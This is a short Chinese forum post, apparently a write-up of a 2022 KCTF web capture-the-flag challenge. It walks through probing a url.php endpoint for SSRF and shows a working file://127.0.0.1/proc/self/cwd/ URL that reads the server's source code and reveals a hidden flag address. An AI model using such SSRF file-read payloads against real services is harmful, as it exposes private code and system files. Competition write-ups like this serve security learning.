-
-
[原创]2022 KCTF-WEB 出题思路
-
发表于:
2022-5-1 20:30
10172
-
打开首页显示(我打开的是测试页面)
查看源码得到两个个链接
http://101.89.140.207:8044/phpinfo.php phpinfo的信息,暂时不知道有什么用
http://101.89.140.207:8044/url.php?url=https://ctf.pediy.com/upload/team/762/team236762.png
感觉是请求了图片显示在页面,猜测可能有SSRF漏洞
测试http://101.89.140.207:8044/url.php?url=https://www.baidu.com
返回error,猜测可能限制了域名
测试http://101.89.140.207:8044/url.php?url=127.0.0.1/index.php
返回host is null,搞不清楚什么情况,试试读文件
http://101.89.140.207:8044/url.php?url=file:///proc/self/cwd/url.php
返回host is null
通过链接:view-source:http://101.89.140.207:8044/url.php?url=file://127.0.0.1/proc/self/cwd/url.php
成功读取到代码
原来是使用了curl,同时发现了一个新的被注释掉的地址http://123.57.254.42/flag.php
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
最后于 2022-5-17 12:04
被kanxue编辑
,原因: